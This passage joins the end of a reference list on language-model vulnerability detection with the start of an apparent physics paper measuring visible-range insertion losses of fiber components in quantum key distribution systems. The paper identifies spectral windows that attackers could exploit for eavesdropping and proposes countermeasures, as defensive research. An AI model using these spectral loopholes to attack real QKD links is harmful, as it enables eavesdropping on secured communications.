[65] Nie, X., Li, N., Wang, K., Wang, S., Luo, X., and Wang, H. Understanding and tackling label errors in deep learning-based vulnerability detection (experience paper). In Proceedings of the 32nd ACM SIGSOFT International Symposium on Software Testing and Analysis, ISSTA 2023, Seattle, WA, USA, July 17-21, 2023 (2023), R. Just and G. Fraser, Eds., ACM, pp. 52–63.
[66] Nijkamp, E., Hayashi, H., Xiong, C., Savarese, S., and Zhou, Y. CodeGen2: Lessons for training LLMs on programming and natural languages. CoRR abs/2305.02309 (2023).
[67] Nijkamp, E., Hayashi, H., Xiong, C., Savarese, S., and Zhou, Y. CodeGen2: Lessons for training LLMs on programming and natural languages. arXiv preprint arXiv:2305.02309 (2023).
[68] Nijkamp, E., Pang, B., Hayashi, H., Tu, L., Wang, H., Zhou, Y., Savarese, S., and Xiong, C. CodeGen: An open large language model for code with multi-turn program synthesis. In The Eleventh International Conference on Learning Representations, ICLR 2023, Kigali, Rwanda, May 1-5, 2023 (2023), OpenReview.net.
[69] Nong, Y., Aldeen, M., Cheng, L., Hu, H., Chen, F., and Cai, H. Chain-of-thought prompting of large language models for discovering and fixing software vulnerabilities. CoRR abs/2402.17230 (2024).
[70] Nong, Y., Yang, H., Cheng, L., Hu, H., and Cai, H. Automated software vulnerability patching using large language models. arXiv preprint arXiv:2408.13597 (2024).
[71] OpenAI. GPT-3.5. https://platform.openai.com/docs/models/gpt-3-5, 2022.
[72] OpenAI. GPT-4 technical report, 2023.
[73] Pan, S., Luo, L., Wang, Y., Chen, C., Wang, J., and Wu, X. Unifying large language models and knowledge graphs: A roadmap. arXiv preprint arXiv:2306.08302 (2023).
[74] Pearce, H., Tan, B., Ahmad, B., Karri, R., and Dolan-Gavitt, B. Examining zero-shot vulnerability repair with large language models. In 2023 IEEE Symposium on Security and Privacy (SP) (2023), IEEE, pp. 2339–2356.
[75] Peng, T., Chen, S., Zhu, F., Tang, J., Liu, J., and Hu, X. PTLVD: program slicing and transformer-based line-level vulnerability detection system. In 23rd IEEE International Working Conference on Source Code Analysis and Manipulation, SCAM 2023, Bogotá, Colombia, October 2-3, 2023 (2023), L. Moonen, C. D. Newman, and A. Gorla, Eds., IEEE, pp. 162–173.
[76] Purba, M. D., Ghosh, A., Radford, B. J., and Chu, B. Software vulnerability detection using large language models. In 34th IEEE International Symposium on Software Reliability Engineering, ISSRE 2023 - Workshops, Florence, Italy, October 9-12, 2023 (2023), IEEE, pp. 112–119.
[77] Qin, Y., Liang, S., Ye, Y., Zhu, K., Yan, L., Lu, Y., Lin, Y., Cong, X., Tang, X., Qian, B., Zhao, S., Hong, L., Tian, R., Xie, R., Zhou, J., Gerstein, M., Li, D., Liu, Z., and Sun, M. ToolLLM: Facilitating large language models to master 16000+ real-world APIs, 2023.
[78] Radford, A., Wu, J., Child, R., Luan, D., Amodei, D., Sutskever, I., et al. Language models are unsupervised multitask learners. OpenAI blog 1, 8 (2019), 9.
[79] Raffel, C., Shazeer, N., Roberts, A., Lee, K., Narang, S., Matena, M., Zhou, Y., Li, W., and Liu, P. J. Exploring the limits of transfer learning with a unified text-to-text transformer. The Journal of Machine Learning Research 21, 1 (2020), 5485–5551.
[80] Ren, S., Guo, D., Lu, S., Zhou, L., Liu, S., Tang, D., Sundaresan, N., Zhou, M., Blanco, A., and Ma, S. CodeBLEU: a method for automatic evaluation of code synthesis. CoRR abs/2009.10297 (2020).
[81] Risse, N., and Böhme, M. Uncovering the limits of machine learning for automatic vulnerability detection. In 33rd USENIX Security Symposium, USENIX Security 2024, Philadelphia, PA, USA, August 14-16, 2024 (2024), D. Balzarotti and W. Xu, Eds., USENIX Association.
[82] Schulman, J., Wolski, F., Dhariwal, P., Radford, A., and Klimov, O. Proximal policy optimization algorithms. arXiv preprint arXiv:1707.06347 (2017).
[83] Sejfia, A., Das, S., Shafiq, S., and Medvidovic, N. Toward improved deep learning-based vulnerability detection. In Proceedings of the 46th IEEE/ACM International Conference on Software Engineering, ICSE 2024, Lisbon, Portugal, April 14-20, 2024 (2024), ACM, pp. 62:1–62:12.
[84] Sejfia, A., Das, S., Shafiq, S., and Medvidović, N. Toward improved deep learning-based vulnerability detection. In Proceedings of the 46th IEEE/ACM International Conference on Software Engineering (2024), pp. 1–12.
[85] Shahriar, H., and Zulkernine, M. Mitigating program security vulnerabilities: Approaches and challenges. ACM Computing Surveys (CSUR) 44, 3 (2012), 1–46.
[86] Shao, Z., Gong, Y., Shen, Y., Huang, M., Duan, N., and Chen, W. Enhancing retrieval-augmented large language models with iterative retrieval-generation synergy. arXiv preprint arXiv:2305.15294 (2023).
[87] Shestov, A., Cheshkov, A., Levichev, R., Mussabayev, R., Zadorozhny, P., Maslov, E., Vadim, C., and Bulychev, E. Finetuning large language models for vulnerability detection. CoRR abs/2401.17010 (2024).
[88] Steenhoek, B., Rahman, M. M., Jiles, R., and Le, W. An empirical study of deep learning models for vulnerability detection. In 2023 IEEE/ACM 45th International Conference on Software Engineering (ICSE) (2023), IEEE, pp. 2237–2248.
[89] Steenhoek, B., Rahman, M. M., Jiles, R., and Le, W. An empirical study of deep learning models for vulnerability detection. In 45th IEEE/ACM International Conference on Software Engineering, ICSE 2023, Melbourne, Australia, May 14-20, 2023 (2023), IEEE, pp. 2237–2248.
[90] Steenhoek, B., Rahman, M. M., Sharmin, S., and Le, W. Do language models learn semantics of code? A case study in vulnerability detection. arXiv preprint arXiv:2311.04109 (2023).
[91] Tabassum, J., Maddela, M., Xu, W., and Ritter, A. Code and named entity recognition in Stack Overflow. In Proceedings of the 58th Annual Meeting of the Association for Computational Linguistics (ACL) (2020).
[92] Tang, W., Tang, M., Ban, M., Zhao, Z., and Feng, M. CSGVD: A deep learning approach combining sequence and graph embedding for source code vulnerability detection. J. Syst. Softw. 199 (2023), 111623.
[93] Targett, E. We analysed 90,000+ software vulnerabilities: Here's what we learned. https://www.thestack.technology/analysis-of-cves-in-2022-software-vulnerabilities-cwes-most-dangerous/, 2022.
[94] Thapa, C., Jang, S. I., Ahmed, M. E., Camtepe, S., Pieprzyk, J., and Nepal, S. Transformer-based language models for software vulnerability detection. In Annual Computer Security Applications Conference, ACSAC 2022, Austin, TX, USA, December 5-9, 2022 (2022), ACM, pp. 481–496.
[95] Tran, H.-C., Tran, A.-D., and Le, K.-H. DetectVul: A statement-level code vulnerability detection for Python. Future Generation Computer Systems (2024), 107504.
[96] Trivedi, H., Balasubramanian, N., Khot, T., and Sabharwal, A. Interleaving retrieval with chain-of-thought reasoning for knowledge-intensive multi-step questions. arXiv preprint arXiv:2212.10509 (2022).
[97] Vaswani, A., Shazeer, N., Parmar, N., Uszkoreit, J., Jones, L., Gomez, A. N., Kaiser, Ł., and Polosukhin, I. Attention is all you need. Advances in Neural Information Processing Systems 30 (2017).
[98] Vicarius. vuln_gpt debuts as AI-powered approach to find and remediate software vulnerabilities. https://venturebeat.com/ai/got-vulns-vuln_gpt-debuts-as-ai-powered-approach-to-find-and-remediate-software-vulnerabilities/, 2023.
[99] Wang, H., Tang, Z., Tan, S. H., Wang, J., Liu, Y., Fang, H., Xia, C., and Wang, Z. Combining structured static code information and dynamic symbolic traces for software vulnerability prediction. In Proceedings of the 46th International Conference on Software Engineering (2024), ACM.
[100] Wang, J., Huang, Y., Chen, C., Liu, Z., Wang, S., and Wang, Q. Software testing with large language model: Survey, landscape, and vision. arXiv preprint arXiv:2307.07221 (2023).
[101] Wang, L., Ma, C., Feng, X., Zhang, Z., Yang, H., Zhang, J., Chen, Z., Tang, J., Chen, X., Lin, Y., et al. A survey on large language model based autonomous agents. Frontiers of Computer Science 18, 6 (2024), 1–26.
[102] Wang, R., Li, Z., Wang, C., Xiao, Y., and Gao, C. NAVRepair: Node-type aware C/C++ code vulnerability repair. CoRR abs/2405.04994 (2024).
[103] Wang, Y., Wang, W., Joty, S., and Hoi, S. C. CodeT5: Identifier-aware unified pre-trained encoder-decoder models for code understanding and generation. arXiv preprint arXiv:2109.00859 (2021).
[104] Wei, Y., Bo, L., Wu, X., Li, Y., Ye, Z., Sun, X., and Li, B. VulRep: vulnerability repair based on inducing commits and fixing commits. EURASIP Journal on Wireless Communications and Networking 2023, 1 (2023), 34.
[105] Wen, X., Wang, X., Chen, Y., Hu, R., Lo, D., and Gao, C. VulEval: Towards repository-level evaluation of software vulnerability detection. CoRR abs/2404.15596 (2024).
[106] Wen, X., Wang, X., Gao, C., Wang, S., Liu, Y., and Gu, Z. When less is enough: Positive and unlabeled learning model for vulnerability detection. In 38th IEEE/ACM International Conference on Automated Software Engineering, ASE 2023, Luxembourg, September 11-15, 2023 (2023), IEEE, pp. 345–357.
[107] Weng, C., Qin, Y., Lin, B., Liu, P., and Chen, L. MatSVD: Boosting statement-level vulnerability detection via dependency-based attention. In Proceedings of the 15th Asia-Pacific Symposium on Internetware, Internetware 2024, Macau, SAR, China, July 24-26, 2024 (2024), H. Mei, J. Lv, A. Helal, X. Ma, S. Cheung, J. Zhang, and T. Zhang, Eds., ACM.
[108] Wohlin, C. Guidelines for snowballing in systematic literature studies and a replication in software engineering. In Proceedings of the 18th International Conference on Evaluation and Assessment in Software Engineering (EASE) (2014), ACM, pp. 38:1–38:10.
[109] Wu, B., Zou, F., et al. Code vulnerability detection based on deep sequence and graph models: A survey. Security and Communication Networks 2022 (2022).
[110] Wu, Y., Jiang, N., Pham, H. V., Lutellier, T., Davis, J., Tan, L., Babkin, P., and Shah, S. How effective are neural networks for fixing security vulnerabilities. In Proceedings of the 32nd ACM SIGSOFT International Symposium on Software Testing and Analysis, ISSTA 2023, Seattle, WA, USA, July 17-21, 2023 (2023), R. Just and G. Fraser, Eds., ACM, pp. 1282–1294.
[111] Xu, F. F., Alon, U., Neubig, G., and Hellendoorn, V. J. A systematic evaluation of large language models of code. In MAPS@PLDI 2022: 6th ACM SIGPLAN International Symposium on Machine Programming, San Diego, CA, USA, 13 June 2022 (2022), S. Chaudhuri and C. Sutton, Eds., ACM, pp. 1–10.
[112] Yamaguchi, F. Joern: A source code analysis tool. https://github.com/octopus-platform/joern, 2023.
[113] Yang, A. Z., Tian, H., Ye, H., Martins, R., and Goues, C. L. Security vulnerability detection with multitask self-instructed fine-tuning of large language models. arXiv preprint arXiv:2406.05892 (2024).
[114] Yang, J., Jin, H., Tang, R., Han, X., Feng, Q., Jiang, H., Zhong, S., Yin, B., and Hu, X. B. Harnessing the power of LLMs in practice: A survey on ChatGPT and beyond. ACM Trans. Knowl. Discov. Data 18, 6 (2024), 160:1–160:32.
[115] Yang, X., Wang, S., Li, Y., and Wang, S. Does data sampling improve deep learning-based vulnerability detection? Yeas! and nays! In 45th IEEE/ACM International Conference on Software Engineering, ICSE 2023, Melbourne, Australia, May 14-20, 2023 (2023), IEEE, pp. 2287–2298.
[116] Yang, Z., Shi, J., He, J., and Lo, D. Natural attack for pre-trained models of code. In Proceedings of the 44th International Conference on Software Engineering (2022).
[117] Yin, X. Pros and cons! Evaluating ChatGPT on software vulnerability. CoRR abs/2404.03994 (2024).
[118] Zhang, B., Liang, P., Zhou, X., Ahmad, A., and Waseem, M. Practices and challenges of using GitHub Copilot: An empirical study. In The 35th International Conference on Software Engineering and Knowledge Engineering, SEKE 2023, KSIR Virtual Conference Center, USA, July 1-10, 2023 (2023), S. Chang, Ed., KSI Research Inc., pp. 124–129.
[119] Zhang, C., Liu, H., Zeng, J., Yang, K., Li, Y., and Li, H. Prompt-enhanced software vulnerability detection using ChatGPT. arXiv preprint arXiv:2308.12697 (2023).
[120] Zhang, H., Babar, M. A., and Tell, P. Identifying relevant studies in software engineering. Inf. Softw. Technol. 53, 6 (2011), 625–637.
[121] Zhang, J., Liu, Z., Hu, X., Xia, X., and Li, S. Vulnerability detection by learning from syntax-based execution paths of code. IEEE Trans. Software Eng. 49, 8 (2023), 4196–4212.
[122] Zhang, Q., Fang, C., Ma, Y., Sun, W., and Chen, Z. A survey of learning-based automated program repair. ACM Transactions on Software Engineering and Methodology 33, 2 (2023), 1–69.
[123] Zhang, Q., Fang, C., Xie, Y., Zhang, Y., Yang, Y., Sun, W., Yu, S., and Chen, Z. A survey on large language models for software engineering. arXiv preprint arXiv:2312.15223 (2023).
[124] Zhang, Q., Fang, C., Yu, B., Sun, W., Zhang, T., and Chen, Z. Pre-trained model-based automated software vulnerability repair: How far are we? IEEE Transactions on Dependable and Secure Computing (2023).
[125] Zhang, T., Kishore, V., Wu, F., Weinberger, K. Q., and Artzi, Y. BERTScore: Evaluating text generation with BERT. In 8th International Conference on Learning Representations, ICLR 2020, Addis Ababa, Ethiopia, April 26-30, 2020 (2020), OpenReview.net.
[126] Zhang, Z., Chen, C., Liu, B., Liao, C., Gong, Z., Yu, H., Li, J., and Wang, R. Unifying the perspectives of NLP and software engineering: A survey on language models for code. arXiv preprint arXiv:2311.07989 (2023).
[127] Zhao, W. X., Zhou, K., Li, J., Tang, T., Wang, X., Hou, Y., Min, Y., Zhang, B., Zhang, J., Dong, Z., et al. A survey of large language models. arXiv preprint arXiv:2303.18223 (2023).
[128] Zhou, X., Kim, K., Xu, B., Han, D., and Lo, D. Out of sight, out of mind: Better automatic vulnerability repair by broadening input ranges and sources. In 2024 IEEE/ACM 46th International Conference on Software Engineering (ICSE) (2024), IEEE Computer Society, pp. 872–872.
[129] Zhou, X., Kim, K., Xu, B., Liu, J., Han, D., and Lo, D. The devil is in the tails: How long-tailed code distributions impact large language models. In 2023 38th IEEE/ACM International Conference on Automated Software Engineering (ASE) (2023), IEEE, pp. 40–52.
[130] Zhou, X., Tran, D.-M., Le-Cong, T., Zhang, T., Irsan, I. C., Sumarlin, J., Le, B., and Lo, D. Comparison of static application security testing tools and large language models for repo-level vulnerability detection. arXiv preprint arXiv:2407.16235 (2024).
[131] Zhou, X., Xu, B., Han, D., Yang, Z., He, J., and Lo, D. CCBERT: Self-supervised code change representation learning. In 2023 IEEE International Conference on Software Maintenance and Evolution (ICSME) (2023), IEEE, pp. 182–193.
[132] Zhou, X., Zhang, T., and Lo, D. Large language model for vulnerability detection: Emerging results and future directions. ICSE NIER track (2024).
[133] Zhou, Z., Bo, L., Wu, X., Sun, X., Zhang, T., Li, B., Zhang, J., and Cao, S. SPVF: security property assisted vulnerability fixing via attention-based models. Empirical Software Engineering 27, 7 (2022), 171.
[134] Ziems, N., and Wu, S. Security vulnerability detection using deep learning natural language processing. In 2021 IEEE Conference on Computer Communications Workshops, INFOCOM Workshops 2021, Vancouver, BC, Canada, May 10-13, 2021 (2021), IEEE, pp. 1–6.
2404.03956

Vulnerabilities of quantum key distribution systems in visible range

Boris Nasedkin,1,2,∗ Azat Ismagilov,1 Vladimir Chistiakov,2 Andrei Gaidash,1,3 Aleksandr Shimko,4 Alexei D. Kiselev,1 Anton Tcypkin,1 Vladimir Egorov,2 and Anton Kozubov1,3
1Laboratory of Quantum Processes and Measurements, ITMO University, 199034, 3b Kadetskaya Line, Saint Petersburg, Russia
2Laboratory for Quantum Communications, ITMO University, 199034, 3b Kadetskaya Line, Saint Petersburg, Russia
3Department of Mathematical Methods for Quantum Technologies, Steklov Mathematical Institute of Russian Academy of Sciences, 119991, 8 Gubkina St, Moscow, Russia
4Center for Optical and Laser materials research, Saint-Petersburg State University, 198504, 5 Ulianovskaya, Saint Petersburg, Russia
(Dated: August 15, 2024)

Spectral loopholes in the 1000-2100 nm range have been the focus of attention of quantum hacking research aimed at searching and elimination of vulnerabilities in quantum key distribution systems. In this work, we concentrate on shorter wavelengths, ranged from 400 nm up to 800 nm, and experimentally study spectra of insertion losses for a number of fiber optical components to assess potentials for their implementation as countermeasures. We show that the efficiency of the elements commonly used as countermeasures against hacking attacks in the telecom range can be significantly impaired in the visible range. It is found that the vulnerabilities detected in this range play an increasingly important role for hacking strategies such as the induced-photorefraction attack, whose efficiency improves when the wavelength decreases. We consider security issues that emerge due to the latter effect and discuss possible countermeasures, if any, for various utilization cases of phase modulators.

I. INTRODUCTION

The security of quantum key distribution (QKD) systems hinges upon the fundamental laws of physics. Over the past decades, significant progress has been made in theoretical security proofs [1–12]. However, many of these proofs rest on the assumption of perfect and trusted devices. Such a trust assumption imposes a rather strong security requirement, which is generally difficult to implement in practice. In real situations, imperfect devices in QKD systems would introduce vulnerabilities that can be exploited by eavesdroppers to extract additional information about the transmitted bits during their attacks, as is considered in [11–16]. Device-independent (DI) [17–21] and semi-device-independent [22–25] protocols have emerged as a prominent area of research that provides a way to prevent side-channel attacks [26].
On the opposite side, another rapidly developing field, which is often referred to as quantum hacking, has received a considerable amount of attention [27]. Emerging approaches in quantum hacking pose novel challenges for security analysis of QKD systems. Numerous vulnerabilities have been identified in prior works [28–30], underscoring the importance of enhancing security measures. Eavesdropper strategies in quantum hacking can broadly be classified under two basic types, active and passive, as well as combinations thereof. Active strategies involve the manipulation of optical parameters within the hardware, whereas passive strategies solely facilitate the acquisition of additional information.

A quintessential illustration of a passive attack is the Trojan-horse attack (THA), which is also known as the large pulse attack [31, 32]. In this scenario, the eavesdropper (Eve) employs scanning pulses introduced into the systems of legitimate users (Alice and Bob) via the quantum channel, allowing for the extraction of distributed sequences from the reflected portions of the eavesdropper pulses back into the quantum channel. The key factors that determine the efficiency of this attack involve the transmittance of elements in two directions and the distinguishability of states, along with the countermeasures utilized in the system. An important point is that all these factors require the eavesdropper to define the optimal spectral range of wavelengths employed to perform the attack.

The well-known detector blinding attack (DBA) [33–35] exemplifies an active attack. The idea underlying the attack is that, under the action of high-power laser radiation (as compared to typical intensities used in QKD), the operating mode of single photon detectors (SPDs) based on avalanche photodiodes can be changed from the Geiger mode into the linear operating mode, so that the eavesdropper can manipulate the clicks registered by the SPDs. The efficiency of this DBA based quantum hacking approach crucially depends on the spectral sensitivity of the avalanche photodiode, the transmittance of optical elements connecting the quantum channel with the single photon avalanche diode (SPAD), and the countermeasures implemented into the QKD system. So, it turned out that, similar to the Trojan-horse attack, the spectral range is one of the factors that govern the success of the DBA attack.

Previous studies [36–39], motivated by the THA, have mainly been focused on transmittance of fiber optical elements utilized in QKD systems at wavelengths ranged between 1000 nm and 2100 nm. For the 600-1000 nm range, the experimental results were reported in Refs. [39, 40]. But, for the above discussed DBA and the laser damage attacks (LDA) that exploit temperature dependence of the transmittance of fiber-optical elements [41–43], shorter wavelengths may also be used. At shorter wavelengths, low insertion losses of elements employed for countermeasures may lead to unnoticed and thus potentially successful delivery of radiation injected by Eve to the elements under attack.

∗ banasedkin@itmo.ru
New vulnerabilities at different wavelengths have been the subject of intense recent studies [44]. The induced-photorefraction attack (IPA) [27, 45] represents attacks that will do better in the visible spectral range [46]. In addition, this attack is claimed to be applicable for hacking measurement device independent (MDI) QKD systems [27].

The main targets of the IPA are phase and amplitude modulators based on photo-refractive crystals, where variations in refractive index or transmittance can be induced by light. The IPA strategy enables Eve to manipulate the characteristics of quantum states, i.e. the mean photon number, at the sender's side using laser radiation. The efficiency of these attacks improves as the radiation wavelength becomes shorter [46]. So, it is important to perform spectral measurements of fiber components used in QKD systems at shorter wavelengths so as to identify and mitigate vulnerabilities exposed by the attack. In particular, the 400-800 nm spectral range has not received proper attention yet. In this paper, our goal is to fill the gap.

Note that, according to Ref. [46], successful implementation of the IPA requires low intensities starting from 3 nW. A comparison between these intensities and the maximal intensity permissible for insertion into a fiber without causing damage, which is typically around 9 W (this value is applicable to quartz single mode fibers without power damage level doping commonly used in fiber communications and may vary among manufacturers), leads to the conclusion that the attenuation needed for passive defence against the IPA for a single pass through optical elements can roughly be estimated at about 100 dB. Thus, in order to assess the feasibility of the attack, it is necessary to measure and analyze insertion losses of individual optical elements on the side of Alice.
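The 100 dB figure can be checked directly from the two power levels quoted above. The short computation below is our own back-of-the-envelope illustration, not the authors' analysis:

    # Attenuation (in dB) needed to bring the fiber damage threshold (~9 W)
    # down to the lowest IPA-relevant intensity (~3 nW) quoted from [46].
    import math

    P_max = 9.0    # W, typical damage threshold of a quartz single-mode fiber
    P_ipa = 3e-9   # W, lowest intensity reported sufficient for the IPA
    alpha_dB = 10 * math.log10(P_max / P_ipa)
    print(f"{alpha_dB:.1f} dB")  # ~94.8 dB, i.e. roughly 100 dB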
To this end, we study the insertion losses of different optical elements in the 400–800 nm spectral range, demonstrate the existence of potential vulnerabilities, and suggest potential countermeasures. The paper is organized as follows. In Sec. II we describe our experimental technique employed to measure spectra of insertion losses of optical elements at wavelengths ranged from 400 nm to 800 nm. The experimental data for insertion losses measured for a variety of optical attenuators, wave-division multiplexing (WDM) and isolating components are presented in Sec. III. Security issues related to the considered effect and proposed countermeasures are discussed in Sec. IV. Finally, in Sec. V, we discuss and summarize our results.

II. EXPERIMENTAL SETUP AND METHOD

Figure 1 shows the optical scheme of our experimental setup used to measure the insertion losses of optical elements in the visible range. In this scheme, a broadband plasma light source (XWS65, ISTEQ), indicated as the broadband light source (BLS), is utilized to produce light with wavelengths ranged from 250 nm up to 2500 nm. Referring to Fig. 1, the radiation from this source is directed into a single-mode fiber (OF), passing through a set of lenses (L), filters (F) and the objective (O), which is positioned on a three-axis stage to meet coupling and spectrum requirements. After the fiber, the focused light propagates through either a fiber or a fiber with the optical elements under test and is measured by the spectrometer (USB4000-UV-VIS-ES, Ocean Optics) with the 1.5 nm resolution.

Figure 1. Optical scheme for insertion losses measurements in the visible range. BLS is broadband light source, L is lens, F is set of filters, O is objective, OF is single mode optical fiber, EUT is element under test, S is spectrometer.

An important point is that the spectrometer is equipped with its own multimode fiber with an SMA905 connector. So, in order to align the single-mode and multimode fibers, we have used the FC-SMA905 connector.

Due to variations in efficiency of coupling to the single-mode fiber, losses due to absorption by the filters, and technical restrictions imposed by the spectrometer, the measured spectrum of the broadband light source (BLS) was narrowed to the 400-800 nm range. Insertion losses of the optical element under test were calculated as follows:

    α_dB(λ) = −10 log10[ P_mes(λ) / ( P_ref(λ) T_f(λ) ) ] ,    (1)

where the powers P_ref(λ) and P_mes(λ) are measured at wavelength λ without and with the tested optical element, respectively; T_f(λ) is the transmission of the set of filters. Note that, in our experiments, the neutral filters were used to extend the dynamic range of measurements. For each element, we have performed ten measurements and the experimental results were averaged (details on the error estimation procedure can be found in Appendix B of Ref. [37]).
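Applied to measured spectra, Eq. (1) amounts to an elementwise computation over wavelength. The following sketch is an illustrative implementation under our own assumptions (array shapes and names are hypothetical; this is not the authors' processing code):

    # Minimal sketch of the insertion-loss calculation of Eq. (1) applied
    # to measured spectra sampled on a common wavelength grid.
    import numpy as np

    def insertion_loss_dB(P_mes, P_ref, T_f):
        # alpha_dB(lambda) = -10 log10[ P_mes / (P_ref * T_f) ], elementwise.
        return -10.0 * np.log10(P_mes / (P_ref * T_f))

    # Example: ten repeated spectra averaged before applying Eq. (1).
    # P_mes_runs: shape (10, n_wavelengths); P_ref, T_f: shape (n_wavelengths,)
    # alpha = insertion_loss_dB(P_mes_runs.mean(axis=0), P_ref, T_f)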
Figure 2. Insertion losses measured in the 400-800 nm range for (a) electro-mechanical and (b) electro-optical variable optical attenuators (blue and red solid lines indicate the zero-voltage curve and the case where the applied voltage is 5 V, respectively); (c) absorption-based fixed attenuators (the curves for the first 20 dB FOA, the second 20 dB FOA and the 10 dB FOA are indicated by black, red, and blue solid lines, respectively); (d) scattering-based fixed attenuators (the curves for the 20 dB FOA, 15 dB FOA and 5 dB FOA are indicated by black, red, and blue solid lines, respectively).

In what follows, we concentrate on the optical elements that are usually placed on the sender's side between the output of the phase and amplitude modulators and the entrance of the quantum channel.

III. EXPERIMENTAL RESULTS

A. Optical attenuators

In this section, we present the results for two variable optical attenuators (VOAs) that differ in the mode of operation, along with six different fixed optical attenuators (FOAs).

In QKD systems, optical attenuators (OAs) are typically employed to reduce the intensity of laser pulses to the single-photon level. Additionally, OAs are important in reducing the probability of successful realization of wavelength-dependent attacks. Consequently, there is a requirement to avoid pronounced variations of the spectral insertion-loss properties of OAs across a broad wavelength range.

In QKD systems, the insertion losses of VOAs are typically adjusted by applying a voltage. This implies that, during the key distribution process, the attenuation value can be tuned in the range between the maximum and minimum insertion losses. To address this variability, we have evaluated the maximal and minimal insertion-loss settings for one electro-mechanical (EM) and one electro-optical (EO) model of VOA. According to the manufacturer datasheets, at the wavelength λ = 1550 nm, the minimal values of insertion losses without power (the field-free regime without applied voltage) are 0.77 dB and 0.80 dB for the EO VOA and the EM VOA, respectively. When the applied voltage is 5 V, the corresponding measured values of insertion losses for the EO VOA and the EM VOA are 36.0 dB and 43.4 dB.

Figures 2(a) and (b) present the wavelength dependencies of insertion losses measured in the 400-800 nm range for the EM VOA and the EO VOA at two values of applied voltage: 0 V and 5 V. In the zero-voltage case, it turned out that the measured insertion losses are higher than the values reported in the datasheet. For the EM VOA and the EO VOA, the minimal losses of 10.7 dB and 21.8 dB are reached at the wavelengths 761 nm and 557 nm, respectively.

Referring to Figs. 2(a) and (b), when the applied voltage is 5 V, the losses vary in the range between 13.7 dB and 30 dB for the EM VOA, whereas, for the EO VOA, they range from 23.7 dB to 50 dB. Note that these maximum values of losses are approximate, as they correspond to the noise level of our experimental setup and depend on the number of neutral filters.

Insertion losses measured as a function of wavelength for the six FOAs are shown in Figs. 2(c) and (d). For the three absorption-based FOAs (see Fig. 2(c)), according to the values reported by the manufacturers, the insertion losses of one FOA are 10 dB, whereas the losses of the other two FOAs are the same and equal to 20 dB. For the scattering-based FOAs (see Fig. 2(d)), there are three different reported values of losses at the operating wavelength (λ = 1550 nm): 5 dB, 15 dB and 20 dB.
Our experimental results are in good agreement with these values.

The insertion losses of the absorption-based FOAs measured in the 400-800 nm range are shown in Fig. 2(c). It can be seen that, for each FOA, there are two transmittance windows where the insertion losses are noticeably lower than the value at the operating wavelength indicated in the legend. The window between 400 nm and 430 nm is located in the vicinity of local minima for the two 20 dB attenuators, with α_dB ≈ 8.1 and α_dB ≈ 8.6 at the wavelength 405 nm (for the 10 dB attenuator, the corresponding value is α_dB ≈ 2.7). Similarly, the other window, in the 750-800 nm wavelength range, is close to the local minima at λ ≈ 780 nm, with the insertion losses estimated at α_dB ≈ 3.4, α_dB ≈ 4.3 and α_dB ≈ 0.9.

Figure 2(d) shows the wavelength dependencies of the insertion losses measured for the scattering-based FOAs. It is seen that, for the 20 dB attenuator, the insertion losses change insignificantly with wavelength, varying from 27 dB to 25 dB. A similar conclusion applies to the 15 dB (5 dB) attenuator, where variations are between 15.6 dB (11.2 dB) and 13 dB (10.8 dB).

B. Wavelength-division multiplexing components

In QKD systems, wavelength-division multiplexing (WDM) components can be used as countermeasures by suppressing radiation with wavelengths outside the range utilized by the communication channel between Alice and Bob. In the simplest case, the key elements of the internal design of a fiber WDM component are thin films deposited on a substrate. Ideally, at the working wavelength, light will enter the common port (the com-port) and, after passing through the thin films and the substrate, will propagate to the corresponding port of the operating wavelengths grid. Other wavelengths are directed to the reflecting port (the ref-port). This port might be connected to a watchdog detector that monitors Eve's probing pulses. The latter assumes that the sensitivity range of the watchdog detector is broad enough to cover wavelengths of potential attacks.

In practice, there are a number of factors limiting the efficiency of WDM components. These include the substrate transmittance as well as the number, ordering, and thicknesses of the thin films. Differences between the perfectly designed mode of operation and its practical implementation may lead to side channels available to the eavesdropper. In our previous study [37], the WDM components were found to have transmittance windows outside the telecom range, in agreement with the theoretical calculations reported in [47].

Similar to Ref. [37], we consider both coarse WDM (CWDM) and dense WDM (DWDM) components. Specifically, insertion losses in the 400-800 nm range are measured for four filters: three CWDM components from the same manufacturer, of which two belong to the same production batch (CWDM1 and CWDM2), and one DWDM component. The results are shown in Fig. 3.

Figure 3. Insertion losses measured in the 400-800 nm range for (a) CWDM1, (b) CWDM2, (c) CWDM3 and (d) DWDM (black, blue, and red solid lines indicate insertion losses measured for light propagating along three different directions: from the ref-port to the 1550-port, from the com-port to the ref-port and from the com-port to the 1550-port, respectively).
In addition to the com-port and the ref-port, the WDM components have the 1550-port corresponding to the operating wavelength λ = 1550 nm. Referring to Fig. 3, when the probing light propagates from the com-port to the 1550-port, each WDM component reveals ranges of wavelengths where the insertion losses are within the interval between 10 dB and 20 dB. Minimal values of insertion losses are presented in Table I. Note that, for the WDM components under consideration, the losses in the telecom range at non-working wavelengths are about 30 dB.

Table I. Minimal insertion losses and corresponding wavelengths for WDM components.

Component   α_min (dB)   λ_min (nm)
CWDM1       10.0         680
CWDM2       10.7         679
CWDM3       9.7          662
DWDM        10.3         665

From Fig. 3, it can be seen that, for the light propagating from the com-port to the ref-port, the insertion losses vary between 10 dB and 30 dB, which is close to the values for the above-discussed direction from the com-port to the 1550-port. For the case of light propagation from the 1550-port to the ref-port, it turned out that the losses are close to the noise level. Note that, when the directions of light propagation are reversed, changes in insertion losses appear to be well below the accuracy of the measurements (the results of these measurements are omitted), and thus nonreciprocity effects have not been observed in our experiments.

C. Isolating components

Isolating elements are typically utilized to reduce reflections back into laser resonators. Similar to the WDM components, in QKD systems these elements may serve as countermeasures against attacks.

In this section, we examine two elements: the dual-stage isolator and the circulator. Since we are mainly interested in countermeasures against the IPA, the case of backward propagation of injected light, where probing pulses travel from the output port to the input port, will be our primary concern.

Figure 4. Insertion losses measured for (a) the dual-stage isolator with light propagating from the output port to the input port; (b) the circulator (blue (red) solid lines represent insertion losses measured for light propagating from the third (fourth) port to the first (second) port).
For the isolator, the spectrum of insertion losses is shown in Fig. 4(a). At the working (operating) wavelength (1550 nm), the measured insertion loss for light propagating in the backward direction is about 65 dB. From the curve depicted in Fig. 4(a), the values of the measured insertion losses are mostly below the noise level that can be detected in our experimental scheme (the dynamic range of our measurements is about 50 dB). But in the 772-800 nm range, with the minimal losses of 44.5 dB reached at λ = 784 nm, the insertion losses appear to be lower than the above value at the operating wavelength.

